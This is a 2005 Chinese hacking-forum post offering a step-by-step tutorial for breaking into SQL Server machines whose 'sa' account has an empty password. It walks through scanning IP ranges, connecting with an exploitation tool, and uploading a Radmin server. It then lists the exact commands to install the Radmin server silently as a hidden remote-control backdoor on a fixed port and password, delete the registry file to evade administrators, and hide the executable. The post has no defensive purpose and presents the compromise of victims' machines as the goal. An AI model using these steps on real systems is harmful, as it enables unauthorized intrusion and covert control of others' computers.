黑色海岸线论坛 - Powered by Discuz! Board

标题: sa空口令入侵 [打印本页]

作者: shidu123 时间: 2005-11-5 11:31 标题: sa空口令入侵

准备工具: Windows NT/2000 自动攻击探测机
      SQL综合利用工具
      radmin服务端
      Radmin影子版3.2
（1）打开Windows NT/2000 自动攻击探测机,作简单的设置.
（2）  在"netbios"中,勾上"列出所有简单的管理员帐号",在"SQL漏洞"中勾上"列出密码为空的SA帐号".
（3）  再在起始IP和结束IP中填入要探测的IP.开始扫描.打开SQL综合利用工具的"SQL服务器设置".输入刚才的IP,点确定,一会儿便连接成功
（4）  打开"利用目录"执行一下DOS命令,如果是windows,则是XP系统或其它系统,这样的系统一般上传后门或服务端不会成功的.我们只要2000系统.（能听懂吧~~~~~~）
（5）现在开始上传radmin服务端,先上传r_server.其它的aaa.reg,admkll.dll类似.radmin服务端全部上传后,执行一下dir 命令,看看是不是真的成功了~（什么？没成功。那是见鬼了~~~~哈）
我们现在开装.安装命令如下
r_server /install /silence （  安装r_server ）
r_server.exe /port:4848 /pass:3407 /save /silence （  把端口定为4848,密码为3407  ）
regedit.exe /s aaa.reg          （把aaa.reg 导入肉鸡的注册表）
net start r_server       （启动r_server ）
del aaa.reg             （为了防止让细心的管理员知道,删除用户名。要是比较菜的管理员就不用了。哈哈）
attrib.exe +h r_server.exe       （隐藏r_server.exe  ）
最后打开 Radmin的控制端,输入IP,设定的端口,这儿是4848,点确定
输入密码,成功了。。这样就可以看到了肉鸡的屏幕！！！

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)